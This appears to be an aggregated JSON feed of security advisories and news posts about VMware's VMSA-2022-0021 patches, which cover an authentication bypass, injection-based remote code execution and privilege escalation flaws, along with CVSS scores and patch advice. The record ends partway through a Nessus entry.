Threat Level Vulnerability Report For a detailed advisory, download the pdf file here Summary VMware has addressed multiple vulnerabilities, including an authentication bypass (CVE-2022-31656), remote code execution (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665), and many more flaws.
{"malwarebytes": [{"lastseen": "2022-08-03T15:33:33", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10\u2014[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA. \n\nStay safe, everyone!\n\nThe post [Update now! VMWare patches critical vulnerabilities in several products](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-08-03T13:27:47", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:27:47", "id": "MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-11T20:55:05", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://www.malwarebytes.com/blog/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10--[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 us a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656 VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>) which are all local privilege escalation vulnerabilities. These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA.\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T13:00:00", "type": "malwarebytes", "title": "Update now! VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:00:00", "id": "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-08-12T14:02:35", "description": "VMware has released security updates to address multiple vulnerabilities in VMware\u2019s Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector, and vRealize Automation. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. \n\n**Updated August 8, 2022:**_ _According to VMware, \"VMware has confirmed malicious code that can exploit CVE-2022-31656 and CVE-2022-31659 in impacted products is publicly available.\"\n\nCISA encourages users and administrators to review VMware Security Advisory [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) and apply the necessary updates. \n\n \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/08/03/vmware-releases-security-updates>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T00:00:00", "type": "cisa", "title": "VMware Releases Security Updates ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31659"], "modified": "2022-08-09T00:00:00", "id": "CISA:78745C11D5F7CDA41C77C0A98F92D5D5", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/08/03/vmware-releases-security-updates", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2022-08-11T20:01:31", "description": "### Takeaways:\n\n * VMWare Workspace ONE vulnerabilities CVE-2022-31656 and CVE-2022-31659 work in tandem to allow a remote attacker with network access to conduct remote code execution on the server.\n * Imperva Threat Research has seen a sharp rise in attacks since a POC was published on August 9, mostly targeting US and Singapore-based sites.\n * Imperva\u2019s defenses have caught thousands of attacks using automated tools developed in the Go programming language, and 30% of attacking IPs have a risk score of 70% or higher.\n * Imperva has deployed dedicated security rules to cover both CVEs.\n\nOn August 9, 2022, a proof-of-concept was released for VMWare\u2019s earlier security advisories CVE-2022-31656 and CVE-2022-31659, published on August 2, 2022. Both of these vulnerabilities affect VMWare Workspace ONE, and build on each other to ultimately allow for remote code execution. \n\nFor context, CVE-2022-31656 allows users with network access to obtain administrative access without authentication, and CVE-2022-31659 allows remote code execution once the malicious user obtains administrator privileges. VMWare has released [patches](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) for both CVEs, and it is recommended that all VMWare Workspace ONE clients apply these patches immediately to mitigate potential exploitation.\n\nImperva began witnessing attack attempts trying to exploit CVE-2022-31656 immediately after the POC was published on August 9, and we\u2019re continuing to see these numbers steadily rise. Most attacks are targeting customers in the US and Singapore across the educational and financial industries, although _all_ VMWare Workspace ONE customers should take action to prevent intrusions. \n\nSo far, Imperva has found several thousand attack attempts, and 30% of the attacking IPs have a risk score of 70% or above. The vast majority of attackers are using automated tools developed in the Go programming language. \n\nSince Imperva\u2019s CWAF has multiple layers of security defense, attack attempts trying to exploit CVE-2022-31656 were initially detected by existing security rules, threat reputation, and bot protection policies. We\u2019ve deployed complete coverage for both vulnerabilities, so all CWAF customers and On-Premises WAF customers with SecureSphere Emergency Feed are protected from CVE-2022-31656 and CVE-2022\u201331659. \n\nThe post [What we know about VMWare CVE-2022\u201331656 and CVE-2022\u201331659](<https://www.imperva.com/blog/what-we-know-about-vmware-cve-2022-31656-and-cve-2022-31659/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T16:55:48", "type": "impervablog", "title": "What we know about VMWare CVE-2022\u201331656 and CVE-2022\u201331659", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31659"], "modified": "2022-08-10T16:55:48", "id": "IMPERVABLOG:EFE468EB28E318764FFAA6B250FFFE78", "href": "https://www.imperva.com/blog/what-we-know-about-vmware-cve-2022-31656-and-cve-2022-31659/", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-08-11T18:59:39", "description": "VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.\n\nThe bug\u2014tracked as [CVE-2022-31656](<https://tenable.com/cve/CVE-2022-31656>)\u2014earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products [in an update](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) released on Tuesday for flaws that could easily become an exploit chain, researchers said.\n\nCVE-2022-31656 also certainly the most dangerous of these vulnerabilities, and likely will become more so as the researcher who discovered it\u2013[Petrus Viet](<https://twitter.com/VietPetrus>) of VNG Security\u2013has promised [in a tweet](<https://twitter.com/VietPetrus/status/1554485970514608128>) that a proof-of-concept exploit for the bug is \u201csoon to follow,\u201d experts said.\n\nThis adds urgency to the need for organizations affected by the flaw to patch now, researchers said.\n\n\u201cGiven the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,\u201d [Claire Tills](<https://www.tenable.com/profile/claire-tills>), senior research engineer with Tenable\u2019s Security Response Team, said in an email to Threatpost. \u201cAs an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.\u201d\n\n## **Potential for Attack Chain**\n\nSpecifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.\n\nThe bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to [a blog post](<https://www.tenable.com/blog/cve-2022-31656-vmware-patches-several-vulnerabilities-in-multiple-products-vmsa-2022-0021>) by Tills published Tuesday. Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.\n\nMoreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare\u2019s release this week\u2014[CVE-2022-31658](<https://www.tenable.com/cve/CVE-2022-31658>) and [CVE-2022-31659](<https://www.tenable.com/cve/CVE-2022-31659>)\u2014to form an attack chain, Tills observed.\n\nCVE-2022-31658 is a JDBC injection RCE vulnerability that affect VMware Workspace ONE Access, Identity Manager and vRealize Automation that\u2019s earned an \u201cimportant\u201d score on the CVSS\u20148.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.\n\nCVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.\n\nThe other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.\n\n## **Patch Early, Patch Everything**\n\nVMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.\n\nIn late June, for example, federal agencies warned of [attackers pummeling](<https://threatpost.com/log4shell-targeted-vmware-data/180072/>) VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) RCE vulnerability, an [easy-to-exploit flaw](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) discovered in the Apache logging library Log4J late last year and [continuously targeted](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>) on VMware and other platforms since then.\n\nIndeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.\n\nThis scenario occurred in December 2020, when [the feds warned](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.\n\nThough all signs point to the urgency of patching the latest threat to VMware\u2019s platform, it\u2019s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.\n\nThough enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.\n\n\u201cThe most significant risk for enterprises isn\u2019t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,\u201d Fitzgerald said. \u201cThe simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T15:23:16", "type": "threatpost", "title": "VMWare Urges Users to Patch Critical Authentication Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T15:23:16", "id": "THREATPOST:556939F8D58337486DFBC3B2A820DE47", "href": "https://threatpost.com/vmware-patch-critical-bug/180346/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-08-03T09:59:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhTOrIOL2CttCsOisd2VA2-gW84X4_vjRN0VeeVboCjatIhEmWgIzGhZkYZXyQiW0ewz7zHcj_3EwSdqRnAEPwbveJ6sP9b5SJiFO0gUhzcDnZ9z_5ucDfKC7Z8zpknqBWNLKePyknCnTPVaEsOxab4oLFhAcLQshylLe2hoOkVC6gAmgTmPpUk5AgR/s728-e100/vmware.jpg>)\n\nVirtualization services provider VMware on Tuesday shipped updates to [address 10 security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.\n\nThe issues, tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8), impact VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity Manager Connector, vRealize Automation, Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nThe most severe of the flaws is CVE-2022-31656 (CVSS score: 9.8), an authentication bypass vulnerability affecting local domain users that could be leveraged by a bad actor with network access to obtain administrative rights.\n\nAlso resolved by VMware are three remote code execution vulnerabilities (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665) related to JDBC and SQL injection that could be weaponized by an adversary with administrator and network access.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgI_LeUTMPRZAt45PycKydjnK35qzJ1vbQrYZzduBTK3pwXBSzoILVNO-NRrPV10q1CViYba9n3BFSkwCE3OiyPlBjFFKGfCsIsJrAb51zEv4pjpbI2p48W8c3Mtjx69-XrpwGlGorezClU2y2S8TfiA-6eMBO24eui8doqA0Tk1PmsxjAItUOG82gX/s728-e100/flaws.jpg>)\n\nElsewhere, it has also remediated a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31663) that it said is a result of improper user sanitization, which could lead to the activation of malicious JavaScript code.\n\nRounding off the patches are three local privilege escalation bugs (CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664) that permit an actor with local access to escalate privileges to \"root,\" a URL injection vulnerability (CVE-2022-31657), and a path traversal bug (CVE-2022-31662).\n\nWhile successful exploitation of CVE-2022-31657 makes it possible to redirect an authenticated user to an arbitrary domain, CVE-2022-31662 could equip an attacker to read files in an unauthorized manner.\n\nVMware said it's not aware of the exploitation of these vulnerabilities in the wild, but urged customers using the vulnerable products to [apply the patches immediately](<https://core.vmware.com/vmsa-2022-0021-questions-answers-faq>) to mitigate potential threats.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {}, "published": "2022-08-03T04:49:00", "type": "thn", "title": "VMware Releases Patches for Several New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T08:25:40", "id": "THN:97305EC3B8A0058F1A01ECB0B12FBD3E", "href": "https://thehackernews.com/2022/08/vmware-releases-patches-for-several-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2022-11-02T03:01:01", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-09T00:00:00", "id": "VMSA-2022-0021.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-12T17:12:24", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "VMSA-2022-0021", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2022-11-23T18:45:05", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": 